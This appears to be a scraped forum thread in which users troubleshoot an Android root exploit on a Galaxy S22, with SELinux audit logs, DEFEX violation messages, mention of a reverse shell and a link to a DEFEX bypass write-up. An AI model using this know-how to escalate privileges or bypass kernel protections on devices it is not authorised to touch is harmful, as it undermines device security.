|b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al

I have never seen that... Seems the result of pasting some log output to adb shell. Or bug of run.bat?

[polygraphene]

I build mymod.ko with s22 kernel. It too large

du -sh mymod.ko 432K

That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.

[oakieville]

i think im confused when is startup-root and by what i ask due to it doesnt seem to run at all i added a line to echo hello to a file in /data/local/tmp no file is made i also removed all code from it and nothing seems to change at all

[polygraphene]

startup-root is launched here
modprobe process is running on root and selinux is already permissive after the line syscall(__NR_finit_module, ...).
So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

[oakieville]

Ok i wasnt sure if issue was do ti running it from /data/local/tmp

[oakieville]

the beta4 here is the source on page same as that or its different

[oakieville]

beta4 gives permissive however compiled from source does not not sure if source is different or issues in compiling

[oakieville]

i also get this when compiling
make: Circular mymod.ko <- mymod.ko dependency dropped.

[xcainiao]

I build mymod.ko with s22 kernel. It too large
du -sh mymod.ko 432K

That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.

file in ./out/(devicename)/dist/mymod.ko is 92k ...

[oakieville]

i didnt build mymod.ko i use one thats in the source

[elliwigy]

i didnt build mymod.ko i use one thats in the source

I think hes asking his own question as he compiled it but it was toolarge apparently so his is dif. than yours

[elliwigy]

startup-root is launched here modprobe process is running on root and selinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Wouldn't we see DEFEX in the logs though? pretty sure in the past it would log any violations blocked by DEFEX similar to selinux denials..

Also, if it was being blocked wouldnt it still be able to launch a normal uid reverse shell without root privs?

And the ls -al I showed earlier is what I find in data/local/tmp after running run.bat (and even switched to linux and ran run.sh) when it says it worked but fails to launch a reverse shell.. might be the reverse-fifo?

[elliwigy]

startup-root is launched here modprobe process is running on root and selinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

This isnt from my device but here is an example of what it would look like in logs if defex was blocking something:

[ 21.151486] defex: safeplace violation [task=init (/init), child=/root/cbd, uid=0]

[elliwigy]

could it be that vendor_modprobe doesnt have capability of launching data_shell_file on data/local/tmp dir?

ayload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

-29 07:47:12.947 5656 5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:265): avc: denied { search } for pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:266): avc: denied { execute } for pid=5658 comm="modprobe" name="startup-root"dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948 1207 1207 E audit : type=1400 audit(1648565232.943:267): avc: denied { read open } for pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

[oakieville]

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

[elliwigy]

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

Ahh.. there you go then lol we need to somehow use another dir other than data/local/tmp that isnt a safeplace

[elliwigy]

startup-root is launched here modprobe process is running on root and selinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should be run on root+permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Something like this might work no?

https://github.com/vngkv123/articles/blob/main/Galaxy's%20Meltdown%20-%20Exploiting%20SVE-2020-18610.md#:~:text=DEFEX%20Bypass&text=As%20similar%20to%20the%20way,via%20arbitrary%20kernel%20write%20primitive.

[polygraphene]

I build mymod.ko with s22 kernel. It too large
du -sh mymod.ko 432K

That is the output before stripping debug info. Check ./out/(devicename)/dist/mymod.ko file instread.

file in ./out/(devicename)/dist/mymod.ko is 92k ...

Which section takes the capacity? Compare with the one on repository.